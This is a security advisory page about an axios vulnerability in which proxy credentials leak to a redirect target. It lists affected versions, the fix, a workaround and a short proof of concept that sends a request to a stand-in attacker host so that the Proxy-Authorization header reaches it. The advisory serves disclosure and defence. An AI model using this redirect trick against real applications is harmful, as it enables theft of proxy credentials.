Insertion of Sensitive Information Into Sent Data Affecting axios package, versions <0.32.0>=1.0.0 <1.16.0


Severity

Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Social Trends
Exploit Maturity
Proof of Concept
EPSS
0.55% (43rd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JS-AXIOS-17172681
  • published5 Jun 2026
  • disclosed4 Jun 2026
  • creditNgocnn97

Introduced: 4 Jun 2026

NewCVE-2026-44486  (opens in a new tab)
CWE-201  (opens in a new tab)

How to fix?

Upgrade axios to version 0.32.0, 1.16.0 or higher.

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the setProxy function. An attacker can obtain sensitive proxy credentials by controlling a redirect target and causing the application to follow a redirect from a proxied request to a direct connection, resulting in the Proxy-Authorization header being sent to the attacker's server.

Note:

This is only exploitable if the application is running in Node.js with automatic redirects enabled and uses an authenticated proxy configuration, where the redirect target resolves to a direct connection (such as when HTTPS_PROXY is unset or excluded by NO_PROXY).

Workaround

This vulnerability can be mitigated by setting maxRedirects: 0 and handling redirects manually, or by ensuring proxy environment variables are configured consistently across protocols to prevent unexpected changes from proxied to direct connections.

PoC

process.env.HTTP_PROXY = 'http://user:pass@127.0.0.1:8080';
delete process.env.HTTPS_PROXY;

await axios.get('http://attacker.example/start');

CVSS Base Scores

version 4.0
version 3.1